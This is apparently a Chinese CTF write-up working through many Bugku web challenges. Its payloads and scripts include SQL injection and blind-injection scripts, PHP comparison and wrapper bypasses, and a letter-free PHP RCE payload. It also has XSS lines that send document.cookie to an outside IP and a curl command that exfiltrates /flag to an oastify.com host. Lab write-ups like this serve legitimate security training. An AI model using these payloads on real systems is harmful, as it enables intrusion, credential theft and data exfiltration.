滑稽 1 2 3 4 5 6 7 8 9 10 11 GET / HTTP/1.1 Host : 114.67.175.224:12728Cache-Control : max-age=0Upgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Connection : close
计算器 这个题有点懵逼,只能输入一位我是想抓包写脚本拿flag的,结果直接就刚好遇到一个,算对就有flag了
alert 我用Chrome一直弹窗,然后换了Firefox直接取消弹窗看源代码解码即可
你必须让他停下 抓住机会查看源代码即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <html > <head > <meta charset ="utf-8" > <meta name ="viewport" content ="width=device-width, initial-scale=1.0" > <meta name ="description" content ="" > <meta name ="author" content ="" > <title > Dummy game</title > </head > <script language ="JavaScript" > function myrefresh ( ){window .location .reload ();} setTimeout ('myrefresh()' ,500 ); </script > <body > <center > <strong > I want to play Dummy game with others£¡But I can't stop!</strong > </center > <center > Stop at panda ! u will get flag</center > <center > <div > <img src ="10.jpg" /> </div > </center > <br > <a style ="display:none" > flag{080fbeb5341a1bafb531fc130a74f7c1}</a > </body > </html >
头等舱 F12然后HTTP头里面有flag
GET 1 http://114.67.175.224:15269/?what=flag
POST
source 查看源码发现应该是要用githack
1 2 3 4 5 6 githacker --url http://114.67.175.224:14120/.git/ --output-folder './test' git log --reflog git show git reset --hard e0b8e8e2df0e08f9719df35b8cf68ab4cbd8d3b0
结果还出不来,没得到完整
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 wget -r http://114.67.175.224:14120/.git ┌──(kali㉿kali)-[~/桌面/114.67.175.224:14120] └─$ git reflog d256328 (HEAD -> master) HEAD@{0}: reset: moving to d25632 13ce8d0 HEAD@{1}: commit: flag is here? fdce35e HEAD@{2}: reset: moving to fdce35e e0b8e8e HEAD@{3}: reset: moving to e0b8e 40c6d51 HEAD@{4}: commit: flag is here? fdce35e HEAD@{5}: commit: flag is here? d256328 (HEAD -> master) HEAD@{6}: commit: flag is here? e0b8e8e HEAD@{7}: commit (initial): this is index.html ┌──(kali㉿kali)-[~/桌面/114.67.175.224:14120] └─$ git show 40c6d51 commit 40c6d51b81775a1590c1b051d9562222e41c4741 Author: vFREE <flag@flag.com> Date: Sun Jan 17 20:34:43 2021 +0800 flag is here? diff --git a/flag.txt b/flag.txt index aa6f6dc..726e5d1 100644 --- a/flag.txt +++ b/flag.txt @@ -1 +1 @@ -flag{nonono} +flag{git_is_good_distributed_version_control_system}
矛盾 1 2 3 4 5 6 7 $num =$_GET ['num' ];if (!is_numeric ($num )){ echo $num ;if ($num ==1 )echo 'flag{**********}' ;}
%00
截断就行
1 http://114.67.175.224:18871/?num=1%00
备份是个好习惯 扫描出来然后
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php include_once "flag.php" ;ini_set ("display_errors" , 0 );$str = strstr ($_SERVER ['REQUEST_URI' ], '?' );$str = substr ($str ,1 );$str = str_replace ('key' ,'' ,$str );parse_str ($str );echo md5 ($key1 );echo md5 ($key2 );if (md5 ($key1 ) == md5 ($key2 ) && $key1 !== $key2 ){ echo $flag ."取得flag" ; } ?>
1 http://114.67.175.224:12908/?kkeyey1=QNKCDZO&kkeyey2=s214587387a
变量1 1 2 3 4 5 6 7 8 9 10 11 12 <?php error_reporting (0 );include "flag1.php" ;highlight_file (__file__);if (isset ($_GET ['args' ])){ $args = $_GET ['args' ]; if (!preg_match ("/^\w+$/" ,$args )){ die ("args error!" ); } eval ("var_dump($$args );" ); } ?>
这里可变变量直接输出flag就好了
1 2 args=GLOBALS $$args=$GLOBALS
本地管理员 查看源代码拿到密码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 POST / HTTP/1.1 Host : 114.67.175.224:11228Content-Length : 23Pragma : no-cacheCache-Control : no-cacheOrigin : http://114.67.175.224:11228Content-Type : application/x-www-form-urlencodedUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer : http://114.67.175.224:11228/Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8x-forwarded-for : 127.0.0.1Connection : closepass =test123&user=admin
game1 查看源代码重要的就是这一部分
1 2 3 4 5 6 7 8 9 function overShowOver ( ) { $('#modal' ).show (); $('#over-modal' ).show (); var ppp='180.84.29.90' ; var sign = Base64 .encode (score.toString ()); xmlhttp.open ("GET" , "score.php?score=" + score + "&ip=" + ppp + "&sign=" + sign, true ); xmlhttp.send (); $('#over-zero' ).show (); }
我们是可以任意进行覆盖分数的
1 2 3 4 5 6 7 8 9 10 11 GET /score.php?score=75&ip=180.84.29.90&sign=zMNzU=== HTTP/1.1 Host : 114.67.175.224:13710User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : */*Referer : http://114.67.175.224:13710/Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0Connection : close
那这里直接覆盖就好了
1 2 3 4 5 6 7 8 9 10 11 GET /score.php?score=9999&ip=180.84.29.90&sign=zMOTk5OTk= HTTP/1.1 Host : 114.67.175.224:13710User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : */*Referer : http://114.67.175.224:13710/Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0Connection : close
源代码 拿到源代码之后在控制台把结果打印出来
1 2 3 var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62' ;var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b' ;console .log (unescape (p1) + unescape ('%35%34%61%61%32' + p2));
1 2 3 4 5 6 7 8 9 10 11 12 13 14 function checkSubmit ( ) { var a = document .getElementById ("password" ); if (typeof a !== "undefined" ) { if ("67d709b2b54aa2aa648cf6e87a7114f1" === a.value ) { return true ; } alert ("Error" ); a.focus (); return false ; } } document .getElementById ("levelQuest" ).onsubmit = checkSubmit;
网站被黑 提示里面说了是后门直接访问shell.php
,密码爆破即可hack
bp 爆破密码就可以了,这里不放图了
1 2 3 4 5 6 7 8 var r = {code : 'bugku10000' } if (r.code == 'bugku10000' ){ console .log ('e' ); document .getElementById ('d' ).innerHTML = "Wrong account or password!" ; }else { console .log ('0' ); window .location .href = 'success.php?code=' +r.code ; }
这里填进去直接复制粘贴比较好不然一直弄不出来,zxc123
好像需要密码 一样的爆破只不过这里是纯五位数字
12468
shell 1 2 3 4 5 6 7 8 9 10 <?php $poc = "a#s#s#e#r#t" ; $poc_1 = explode ("#" , $poc ); $poc_2 = $poc_1 [0 ] . $poc_1 [1 ] . $poc_1 [2 ] . $poc_1 [3 ] . $poc_1 [4 ] . $poc_1 [5 ];$poc_2 ($_GET ['s' ]);?>
这里直接给了shell
1 http://114.67.175.224:14442/?s=system("cat flaga15808abee46a1d5.txt");
eval 1 2 3 4 5 6 <?php include "flag.php" ; $a = @$_REQUEST ['hello' ]; eval ( "var_dump($a );" ); show_source (__FILE__ ); ?>
1 http://114.67.175.224:10148/?hello=system("tac f*")
需要管理员 robots.txt
得到/resusl.php
1 if ($_GET [x]==$password )
1 http://114.67.175.224:19770/resusl.php?x=admin
程序员本地网站 1 2 3 4 5 6 7 8 9 10 11 12 13 14 GET / HTTP/1.1 Host : 114.67.175.224:11563Pragma : no-cacheCache-Control : no-cacheUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; isview=12468x-forwarded-for : 127.0.0.1Connection : close
你从哪里来 1 2 3 4 5 6 7 8 9 10 11 12 13 14 GET / HTTP/1.1 Host : 114.67.175.224:18705Pragma : no-cacheCache-Control : no-cacheUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; isview=12468referer : www.google.comConnection : close
前女友 1 2 3 4 5 6 7 8 9 10 11 12 <?php if (isset ($_GET ['v1' ]) && isset ($_GET ['v2' ]) && isset ($_GET ['v3' ])){ $v1 = $_GET ['v1' ]; $v2 = $_GET ['v2' ]; $v3 = $_GET ['v3' ]; if ($v1 != $v2 && md5 ($v1 ) == md5 ($v2 )){ if (!strcmp ($v3 , $flag )){ echo $flag ; } } } ?>
1 http://114.67.175.224:12414/?v1[]=1&v2[]=2&v3[]=2
这里全部用数组绕过
MD5 数组绕过不了,碰撞弱等于?
1 http://114.67.175.224:16094/?a=240610708
各种绕过哟 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 <?php highlight_file ('flag.php' );$_GET ['id' ] = urldecode ($_GET ['id' ]);$flag = 'flag{xxxxxxxxxxxxxxxxxx}' ;if (isset ($_GET ['uname' ]) and isset ($_POST ['passwd' ])) { if ($_GET ['uname' ] == $_POST ['passwd' ]) print 'passwd can not be uname.' ; else if (sha1 ($_GET ['uname' ]) === sha1 ($_POST ['passwd' ])&($_GET ['id' ]=='margin' )) die ('Flag: ' .$flag ); else print 'sorry!' ; } ?>
1 2 3 http://114.67.175.224:11633/?id=%6d%61%72%67%69%6e&uname[]=1 POST: passwd[]=2
秋名山车神 脚本题
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import requestsimport reurl="http://114.67.175.224:18454/" s=requests.Session() r=s.get(url) equation=re.search(r'(\d+[+\-*])+(\d+)' ,r.text).group() for i in range (0 ,50 ): result=eval (equation) key={'value' :result} response=s.post(url=url,data=key) print (response.text) if "flag" in response.text: break
速度要快 发包得到假的flag,其中进行了两层的base64编码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 POST / HTTP/1.1 Host : 114.67.175.224:18292Cache-Control : max-age=0Upgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; isview=12468; PHPSESSID=3q824q2rr6j4ee6uubk428j9t0Connection : closeContent-Type : application/x-www-form-urlencodedContent-Length : 13margin = 917329
进行发包之后发现这个东西,每次都会变,那么就写个脚本吧
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 import requestsimport base64url="http://114.67.175.224:18292/" s=requests.Session() for i in range (0 ,50 ): r=s.get(url) header_flag=r.headers['flag' ] header_flag_decoded=base64.b64decode(header_flag) header_flag=header_flag_decoded.decode() value=header_flag.split("flag吧: " )[1 ] v=base64.b64decode(value) v=v.decode('utf-8' ) response=s.post(url=url,data={"margin" :v}) print (response.text) if "flag" in response.text: break print (response.text)
file_get_contents 1 2 3 4 5 6 7 8 9 10 11 12 13 <?php extract ($_GET );if (!empty ($ac )) { $f = trim (file_get_contents ($fn )); if ($ac === $f ) { echo "<p>This is flag: $flag </p>" ; } else { echo "<p>sorry!</p>" ; } } ?>
这里直接绕过就可以了使用php://input
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 POST /?ac=1&fn=php://input HTTP/1.1 Host : 114.67.175.224:18164Pragma : no-cacheCache-Control : no-cacheUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; HMACCOUNT=405D29F9AFFEA4E6; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; Hm_lpvt_c1b044f909411ac4213045f0478e96fc=1731844789; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; isview=12468; PHPSESSID=3q824q2rr6j4ee6uubk428j9t0Connection : closeContent-Length : 1Content-Type : application/x-www-form-urlencoded1
成绩查询 #
注释即可
1 2 3 4 5 6 7 8 9 10 id= -1 'union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4%23 information_schema,mysql,skctf,test id=-1' union select 1 ,(select group_concat(table_name) from information_schema.tables where table_schema= 'skctf' ),3 ,4 % 23 fl4g,sc id= -1 'union select 1,(select group_concat(column_name) from information_schema.columns where table_name=' fl4g'),3,4%23 skctf_flag id=-1' union select 1 ,(select group_concat(skctf_flag) from fl4g),3 ,4 % 23
no select 万能密码
login2 1 2 3 $sql = "SELECT username,password FROM admin WHERE username='".$username."'"; if (! empty ($row ) && $row ['password' ]= = = md5($password)){ }
这里密码可控,直接写
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /login.php HTTP/1.1 Host : 114.67.175.224:13441Content-Length : 75Cache-Control : max-age=0Origin : http://114.67.175.224:13441Content-Type : application/x-www-form-urlencodedUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer : http://114.67.175.224:13441/login.phpAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03Connection : closeusername=1 '+union+select +1 ,'c4ca4238a0b923820dcc509a6f75849b '
进来之后以为是命令执行,试了好久发现延时注入那么也就是无回显,直接试试外带
1 1 ;curl -X POST -F xx=@/flag http://s0tkq771hedhphubgxb7wvdmvd15pu.oastify.com
sql注入 慢慢测,先fuzz,发现用户名可以注入
1 2 3 4 5 6 'or(1<>1)# username does not exist! ' or (1 <> 2 )# password error! 'or(length(database())>7)# password error! ' or (length(database())> 8 )# username does not exist!
1 2 3 4 5 6 7 8 9 substr(‘flag’ from 1 ) substr(‘flag’ from 2 ) substr(‘flag’ from 3 ) substr(‘flag’ from 4 ) substr((reverse(substr(‘flag’ form 1 ))) from 4 ) substr((reverse(substr(‘flag’ form 2 ))) from 3 ) substr((reverse(substr(‘flag’ form 3 ))) from 2 ) substr((reverse(substr(‘flag’ form 4 ))) from 1 )
这里直接写exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 import requestsurl = 'http://114.67.175.224:18214/index.php' database = '' password = '' for i in range (1 , 33 ): for p in range (45 , 126 ): m = 33 - i payload = "1'or(ord(substr(reverse(substr((select(group_concat(password))from(blindsql.admin))from({})))from({})))<>{})#" .format (i, m, p) data = { 'username' : payload, 'password' : '1' } res = requests.post(url=url, data=data) if "username does not exist!" in res.text: password += chr (p) print (password)
不是我说这平台真的卡的日牛,跑这么慢
还有表名我也跑不了,哎蚌埠
都过滤了 懒得喷,跑不出来,但是看上一道题猜进去了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import requestsurl = "http://114.67.175.224:18597/login.php" password = "" for i in range (1 , 100 ): payload1 = "admin'^(length(passwd)=" + str (i) + ")^'" data = { 'uname' : payload1, 'passwd' : '123' } r = requests.post(url=url, data=data) if "username error!!@_@" in r.text: print ("密码的长度是" +str (i)) break for i in range (1 , 33 ): for j in '0123456789abcdefghijklmnopqrstuvwxyz' : payload = "admin'-(ascii(mid((passwd)from(" + str (i) + ")))=" + str (ord (j)) + ")-'" data = { 'uname' : payload, 'passwd' : '123' } r = requests.post(url=url, data=data) if "username error!!@_@" in r.text: password += j print (password) break print ("密码是" +password)
login1 直接注册覆盖
留言板 先扫
没啥用不知道密码,直接打算了
1 <img src=/ onerror="window.location='http:/ /ip:9999/ ?a='+document.cookie;">
长度超过了
1 <body onload="window.open('http://156.238.233.93:9999/'+document.cookie)" >
被转义了,没有打通,看wp有这个文件,这是多少年前的吧,现在访问直接404
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 # Host: localhost (Version: 5.5 .53 ) # Date : 2019 -08 -04 16 :13 :22 # Generator: MySQL- Front 5.3 (Build 4.234 ) ; # # Structure for table "text" # CREATE DATABASE xss DEFAULT CHARACTER SET utf8;use xss; DROP TABLE IF EXISTS `text`;CREATE TABLE `text` ( `Id` int (11 ) NOT NULL AUTO_INCREMENT, `text` varchar (255 ) DEFAULT NULL , PRIMARY KEY (`Id`) ) ENGINE= MyISAM DEFAULT CHARSET= utf8; # # Data for table "text" # ; ; # # Structure for table "user" # DROP TABLE IF EXISTS `user `;CREATE TABLE `user ` ( `Id` int (11 ) NOT NULL AUTO_INCREMENT, `username` varchar (255 ) DEFAULT NULL , `password` varchar (255 ) DEFAULT NULL , PRIMARY KEY (`Id`) ) ENGINE= MyISAM DEFAULT CHARSET= utf8; # # Data for table "user" # ; INSERT INTO `user ` VALUES (1 ,'admin' ,'011be4d65feac1a8' );;
登录之后又弹窗
1 <script>alert (document .cookie )</script>
留言板1 现在的平台已经用不了了emm难绷
文件包含 1 http://114.67.175.224:18683/index.php?file=/flag
cookies 1 http://114.67.175.224:14505/index.php?line=&filename=L2ZsYWc=
然后cookie里面有flag
never_give_up 源码里面1p.html
1 2 3 4 5 6 7 8 var Words ="%3Cscript%3Ewindow.location.href%3D'http%3A%2F%2Fwww.bugku.com'%3B%3C%2Fscript%3E%20%0A%3C!--JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQSUwOWhlYWRlcignTG9jYXRpb24lM0ElMjBoZWxsby5waHAlM0ZpZCUzRDEnKSUzQiUwQSUwOWV4aXQoKSUzQiUwQSU3RCUwQSUyNGlkJTNEJTI0X0dFVCU1QidpZCclNUQlM0IlMEElMjRhJTNEJTI0X0dFVCU1QidhJyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJ2InJTVEJTNCJTBBaWYoc3RyaXBvcyglMjRhJTJDJy4nKSklMEElN0IlMEElMDllY2hvJTIwJ25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJyUzQiUwQSUwOXJldHVybiUyMCUzQiUwQSU3RCUwQSUyNGRhdGElMjAlM0QlMjAlNDBmaWxlX2dldF9jb250ZW50cyglMjRhJTJDJ3InKSUzQiUwQWlmKCUyNGRhdGElM0QlM0QlMjJidWdrdSUyMGlzJTIwYSUyMG5pY2UlMjBwbGF0ZWZvcm0hJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuKCUyNGIpJTNFNSUyMGFuZCUyMGVyZWdpKCUyMjExMSUyMi5zdWJzdHIoJTI0YiUyQzAlMkMxKSUyQyUyMjExMTQlMjIpJTIwYW5kJTIwc3Vic3RyKCUyNGIlMkMwJTJDMSkhJTNENCklMEElN0IlMEElMDklMjRmbGFnJTIwJTNEJTIwJTIyZmxhZyU3QioqKioqKioqKioqJTdEJTIyJTBBJTdEJTBBZWxzZSUwQSU3QiUwQSUwOXByaW50JTIwJTIybmV2ZXIlMjBuZXZlciUyMG5ldmVyJTIwZ2l2ZSUyMHVwJTIwISEhJTIyJTNCJTBBJTdEJTBBJTBBJTBBJTNGJTNF--%3E" function OutWord ( ){ var NewWords ;NewWords = unescape (Words );document .write (NewWords );} OutWord ();
这里解码base64再url解码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ";if(!$_GET ['id']) { header('Location: hello.php?id=1'); exit(); } $id =$_GET ['id'];$a =$_GET ['a'];$b =$_GET ['b'];if(stripos($a ,'.')) { echo 'no no no no no no no'; return ; } $data = @file_get_contents($a ,'r');if($data ==" bugku is a nice plateform!" and $id ==0 and strlen($b )>5 and eregi(" 111 ".substr($b ,0,1)," 1114 ") and substr($b ,0,1)!=4) { $flag = " flag{***********}" } else { print " never never never give up !!!"; } ?>
绕过file_get_contents
昨天还做了的b
的话用通配符就可以绕过了
ereg()
函数或 eregi()
函数存在空字符截断漏洞,即参数中的正则表达式或待匹配字符串遇到空字符则截断丢弃后面的数据。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 POST /hello.php?id=0a&a=php://input&b=?12345 HTTP/1.1 Host : 114.67.175.224:17120Cache-Control : max-age=0Upgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7DConnection : closeContent-Type : application/x-www-form-urlencodedContent-Length : 26bugku+is +a+nice+plateform!
1 http://114.67.175.224:17120/hello.php?id=0b&a=data://text/plain,bugku is a nice plateform!&b=?12345
文件包含2 1 http://114.67.175.224:16529/index.php?file=/flag
ezbypass 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 <?php error_reporting (0 );highlight_file (__FILE__ );if (isset ($_POST ['code' ])) { $code = $_POST ['code' ]; if (strlen ($code ) <= 105 ){ if (is_string ($code )) { if (!preg_match ("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/" ,$code )){ eval ($code ); } else { echo "Hacked!" ; } } else { echo "You need to pass in a string" ; } } else { echo "long?" ; } }
无字母参数RCE
1 2 3 4 5 6 7 8 9 10 11 <?php $_ =(_/_._)[_];$_ ++;$__ =$_ .$_ ++;$_ ++;$_ ++;$_ ++;$__ =$__ .$_ ;$_ ++;$__ =$__ .$_ ;$_ =_.$__ ;var_dump ($_ );
最后是
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 POST / HTTP/1.1 Host : 114.67.175.224:18715Content-Length : 245Pragma : no-cacheCache-Control : no-cacheOrigin : http://114.67.175.224:18715Content-Type : application/x-www-form-urlencodedUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer : http://114.67.175.224:18715/Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7DConnection : closecode=%24_%3D%28_%2F_._%29%5B_%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24__.%24_%3B%24_%2B%2B%3B%24__%3D%24__.%24_%3B%24_%3D_.%24__%3B%24%24_%5B_%5D%28%24%24_%5B__%5D%29%3B&_=system &__=tac+%2Ff*
这里要编码不然总有地方不对
No one knows regex better than me 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 <?php error_reporting (0 );$zero =$_REQUEST ['zero' ];$first =$_REQUEST ['first' ];$second =$zero .$first ;if (preg_match_all ("/Yeedo|wants|a|girl|friend|or|a|flag/i" ,$second )){ $key =$second ; if (preg_match ("/\.\.|flag/" ,$key )){ die ("Noooood hacker!" ); }else { $third =$first ; if (preg_match ("/\\|\056\160\150\x70/i" ,$third )){ $end =substr ($third ,5 ); highlight_file (base64_decode ($zero ).$end ); } } } else { highlight_file (__FILE__ ); }
就一点正则而已,不过这是个特性问题
1 2 3 4 5 6 7 <?php $third ="fdaf|.php" ;if (preg_match ("/\\|\056\160\150\x70/i" ,$third )){ $end =substr ($third ,5 ); echo "yes\n" ; echo $end ; }
1 http://114.67.175.224:19193/?zero=ZmxhZw==&first=abcd|.php
字符?正则? 1 2 3 4 5 6 7 8 <?php highlight_file ('2.php' );$key ='flag{********************************}' ;$IM = preg_match ("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i" , trim ($_GET ["id" ]), $match );if ( $IM ){ die ('key is: ' .$key ); } ?>
key
: 字符串 key
。
.\*
: 匹配任意字符(除了换行符),0 次或多次。
key.{4,7}
: key
后跟 4 至 7 个任意字符。
key:\/.
: 字符串 key:/
,其中的 /
被转义。
/(.\*key)
: 匹配一个斜杠 /
,后面跟着任意字符,直到 key
字符串。
[a-z]
: 匹配一个小写字母。
[[:punct:]]
: 匹配一个标点符号。
i
: 表示不区分大小写的匹配。
这个看着头有点晕啊
